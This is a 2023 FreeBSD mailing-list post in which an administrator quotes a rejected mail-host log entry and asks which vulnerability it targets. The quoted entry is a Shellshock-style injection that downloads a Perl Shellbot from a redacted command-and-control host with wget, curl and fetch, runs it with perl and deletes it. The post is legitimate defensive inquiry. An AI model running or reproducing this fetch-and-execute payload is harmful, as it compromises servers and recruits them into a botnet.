Date:      Sun, 11 Jun 2023 13:38:58 +0200
From:      Andrea Venturoli <ml@netfence.it>
To:        freebsd-questions@freebsd.org
Subject:   Attempted mail attack
Message-ID:  <7128b00c-0427-6f76-bd37-770947aae245@netfence.it>

Hello.

Checking daily periodics of different servers, I'm seeing a variation of 
this:

> Checking for rejected mail hosts:
>    1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w5/meh;perl meh;curl -O x.y.z.w/meh;perl meh;fetch http://x.y.z.w/meh;perl meh;rm -f meh* {:;};cd/tmp;wget.x.y.z.w/meh;...

(I've redacted the C&C IP, even if it's already down).

Of course they are attempting to download a Perl Shellbot (and failing).
I'm curious, though, what vulnerability they are trying to exploit in 
order to do this?
Is it some old one in sendmail? Or what?

  bye & Thanks
	av.


